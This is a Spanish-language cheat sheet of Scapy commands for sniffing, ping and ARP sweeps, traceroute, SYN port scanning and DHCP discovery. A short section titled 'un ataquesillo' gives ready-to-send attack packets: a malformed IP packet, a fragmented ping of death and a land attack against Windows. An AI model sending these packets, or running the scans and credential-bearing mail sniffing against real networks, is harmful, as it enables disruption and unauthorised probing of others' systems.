Scapy utilidades basicas

Conjunto de paltitas utiles posibles en scapy.

 

Sniffing:
 
	Snifear en interfaz eth0:
			sniff(iface="eth0",prn=lambda x: x.summary())
			sniff(iface="eth0",prn=lambda x: x.show())
	filtrando y con formato. Solo ips.
			pkts = sniff(prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))
	identificando puertos
		a=sniff(filter="tcp and ( port 25 or port 110 )",prn=lambda x: x.sprintf("%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport%  %2s,TCP.flags% : %TCP.payload%"))
 
Ping:
	srloop(IP(dst="www.google.com/30")/TCP())
	//con icmp bloqueado
	ans,unans=sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") )
	ans.summary( lambda(s,r) : r.sprintf("%IP.src% conteasta") )
 
	//Udp Ping
	ans,unans=sr( IP(dst="192.168.1.1-10")/UDP(dport=0) )
	ans.summary( lambda(s,r) : r.sprintf("%IP.src% contesta en udp") )
 
Arping:
	ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2)
	ans.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%") )
 
	//normal
	arping("192.168.1.1")
 
Traceroute:
	traceroute(["www.google.com","www.ust.cl","www.terra.cl","www.microsoft.com"],maxttl=20)
	result, unans=_
	result.show()
	//graficar
	result.graph(type="ps", target="|lp")
	result.graph(target="> grafico.svg")
 
tarceroute avanzado:
	//saltandose cortafuegos-por el dns
	ans,unans=sr(IP(dst="terra.cl",ttl=(1,10))/TCP(dport=53,flags="S"))
	ans.summary( lambda(s,r) : r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}"))
 
Graficar tracert:
	res,unans = traceroute(["www.ust.cl","www.santotomas.cl"],dport=[80,443],maxttl=20,retry=-2)
	//graficar
	res.graph(type="ps", target="|lp")
	res.graph(target="> grafico.svg")
 
scanner de puertos:
	res,unans = sr( IP(dst="target")/TCP(flags="S", dport=(1,1024)) )
	//visualizando.
	res.nsummary( lfilter=lambda (s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) )
 
OS fingerprint:
	ans,unans=srloop(IP(dst="192.168.1.1")/TCP(dport=80,flags="S"))
 
un ataquesillo:
	paquete mal formado:
		send(IP(dst="192.168.1.1", ihl=2, version=3)/ICMP())
	Ping of death:
		send( fragment(IP(dst="192.168.1.1")/ICMP()/("X"*60000)) )
	Land attack (windows):
		send(IP(src=target,dst=target)/TCP(sport=135,dport=135))
 
verificandos DHCP de la red:
	conf.checkIPaddr = False
	fam,hw = get_if_raw_hwaddr(conf.iface)
	dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
	ans, unans = srp(dhcp_discover, multi=True)
	//mostando
	ans.display()